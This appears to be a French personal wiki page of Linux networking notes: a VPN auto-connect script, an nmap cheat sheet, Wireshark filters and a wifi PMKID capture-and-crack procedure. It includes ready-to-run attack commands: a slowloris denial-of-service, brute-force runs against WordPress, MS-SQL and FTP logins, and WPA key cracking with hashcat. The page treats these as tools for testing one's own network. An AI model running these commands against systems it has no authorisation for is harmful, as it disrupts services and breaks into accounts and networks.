Outils pour utilisateurs

Outils du site


linux:network

NetworkManager

Connecter le VPN automatiquement

Pour se faire, il suffit d'ajouter le script ci-dessous à l'emplacement indiqué :

/etc/NetworkManager/dispatcher.d/vpn-up
#! /bin/bash
 
REQUIRED_CONNECTION_NAME="<name-of-connection>"
VPN_CONNECTION_NAME="<name-of-vpn-connection>"
 
 
default_conn=$(nmcli con show --active | grep "${REQUIRED_CONNECTION_NAME}")
vpn_conn=$(nmcli con show id | grep "${VPN_CONNECTION_NAME}")
if [ "${default_conn}" -a ! "${vpn_conn}" ];
then
    nmcli con up id "${VPN_CONNECTION_NAME}"
fi

Il faut ensuite simplement adapter les variables REQUIRED_CONNECTION_NAME et VPN_CONNECTION_NAME, et le tour est joué. Un redémarrage du service NetworkManager, ou un reboot de la machine est nécessaire.

source

Nmap

Dans tous les cas, on peut scanner soit un poste avec son ip, soit un réseau avec la forme 192.168.0.0/24.

Scan

Lister les hosts en ligne (non-root)

sudo nmap -sn 192.168.1.0/24

Scanne toutes les IP en 192.168.1.*

Afficher l'OS (root)

sudo nmap -O 192.168.1.51

Scan détaillé (non-root)

sudo nmap -A -T4 192.168.1.13

On ajoute -T4 pour une détection plus rapide (4 Threads)

Ports spécifiques (non-root)

On peut spécifier un port spécifique avec -p [port]. Sans précision supplémentaire, le port sera scanner sur tous les types de protocole (TCP/UDP/SCTP/IP). On peut sinon spécifier avec les options T: pour TCP, U: pour UDP, S: pour SCTP, ou P: pour IP. On peut aussi les utiliser simultanément, comme ceci :

sudo nmap 192.168.1.0/24 -p U:53,111,137,T:21-25,80,139,8080

Scanner sans résolution DNS (gain de temps)

Ajouter le commutateur -n

Détecter les services et leur version (non-root)

nmap -sV 192.168.1.0/24

Scanner les ports TCP (non-root)

nmap -sT 192.168.1.0/24

Scanner les ports UDP (root)

nmap -sU 192.168.1.0/24

Techniques

Détection des CVE/vuln (non-root)

nmap -Pn --script vuln 192.168.1.1

DOS (non-root)

nmap 192.168.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true

Brute Force (non-root)

WordPress

nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105

MS-SQL

nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105

FTP

nmap --script ftp-brute -p 21 192.168.1.105

Check malwares

Script standard

nmap -sV --script=http-malware-host 192.168.1.105

Script Google

nmap -p80 --script http-google-malware infectedsite.com

source

Wireshark

Filtres

Expressions

==
!=
<=
>=
<
>

Opérateurs

AND
(ip.src==192.168.2.25) && (ip.dst==74.125.236.16)
OR
(ip.src==192.168.2.25)||(ip.dst==192.168.2.25)

Filtres

IP Sourceip.src == 192.168.1.10
IP Destinationip.dst == 192.168.1.1
IP (les deux)ip.addr == 192.168.1.10

IP / Hostnames / DNS

Hostname à partir de l'IP

getent hosts IP

Cela fonctionne aussi bien en LAN que sur des hosts distants.

WIFI

Observer le traffic

Créer une interface moniteur

sudo iw phy phy0 interface add mon0 type monitor

Lister les SSID

airodump-ng mon0

Supprimer une interface moniteur

sudo iw mon0 del

Tester la sécurité d'un réseau

Attention, ceci est à réaliser uniquement sur votre propre box internet. Vous êtes responsables de vos actes.

Installation des paquets nécessaires

Sous Archlinux (utilisation d'un AUR Helper requise)

yay -S hashcat hcxtools hcxdumptool aircrack-ng

Cibler la box

  • Déconnecter le réseau wifi
  • Lister les interfaces
ip link
  • Lancer le moniteur sur l'interface wifi
sudo airmon-ng start wlan0

Une ligne devrait ressembler à ça : (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon). Cela signifie que l'on vient de créer l'interface moniteur wlan0mon.

  • Lister les points d'accès
sudo airodump-ng wlan0mon

Une liste des BSSID alentours s'affiche. On peut y voir les noms, les canaux, le type de sécurité, les “beacons” et les adresses macs. Récupérer l'adresse mac du point d'accès que vous souhaitez tester.

On met ensuite l'adresse MAC dans un fichier texte :

echo '001122AABBCC' > mac.txt

Lancement de la capture

sudo hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 enable_status=3

Le programme va lister une partie du traffic, ligne par ligne. Au bout d'un moment (2 à 5 min environ), une ligne [FOUND PMKID] doit apparaitre. Faire immédiatement Ctrl+C après l'apparition de cette ligne.

Décryptage de la clé

  • Génération du fichier “hashtocrack”
hcxpcaptool -z hashtocrack hash
  • Décryptage du fichier “hashtocrack”
hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
  • Afficher le mot de passe
hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show

Le mot de passe est le dernier bloc de caractères après le 3ème “*”

Source

linux/network.txt · Dernière modification: 2019/12/03 09:45 par T0MuX